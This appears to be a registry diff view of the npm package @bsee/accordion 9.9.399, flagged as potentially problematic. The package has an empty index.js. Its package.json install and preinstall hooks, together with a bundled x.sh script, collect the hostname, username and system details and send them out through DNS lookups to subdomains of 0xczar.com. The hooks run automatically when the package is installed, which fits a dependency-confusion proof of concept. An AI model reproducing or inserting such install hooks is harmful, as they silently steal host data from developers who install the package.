@bsee/accordion 9.9.399

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @bsee/accordion might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/package.json +13 -0
  3. package/x.sh +4 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "@bsee/accordion",
3
+ "version": "9.9.399",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "install": "cmd /v /c \"hostname > czar1_hostname && certutil -encode czar1_hostname czar2_hostname && findstr /L /V \"CERTIFICATE\" czar2_hostname > czar3_hostname && set /p CZARVARHOSTNAME=<czar3_hostname && set CZARFINAL=comcast-DC-poc.!CZARVARHOSTNAME!.sub.0xczar.com && nslookup !CZARFINAL! && whoami > czar1_whoami && certutil -encode czar1_whoami czar2_whoami && findstr /L /V \"CERTIFICATE\" czar2_whoami > czar3_whoami && set /p CZARVARWHOAMI=<czar3_whoami && set CZARFINAL=comcast-DC-poc.!CZARVARWHOAMI!.sub.0xczar.com && nslookup !CZARFINAL!\"",
9
+ "preinstall": "mv x.sh /tmp/ && /bin/bash /tmp/x.sh"
10
+ },
11
+ "author": "",
12
+ "license": "ISC"
13
+ }
package/x.sh ADDED
@@ -0,0 +1,4 @@
1
+ #!/bin/bash
2
+ nslookup comcast-DC-poc.x$(hostname|base64).sub.0xczar.com
3
+ nslookup comcast-DC-poc.x$(whoami|base64).sub.0xczar.com
4
+ nslookup comcast-DC-poc.a$(uname -a|base64).sub.0xczar.com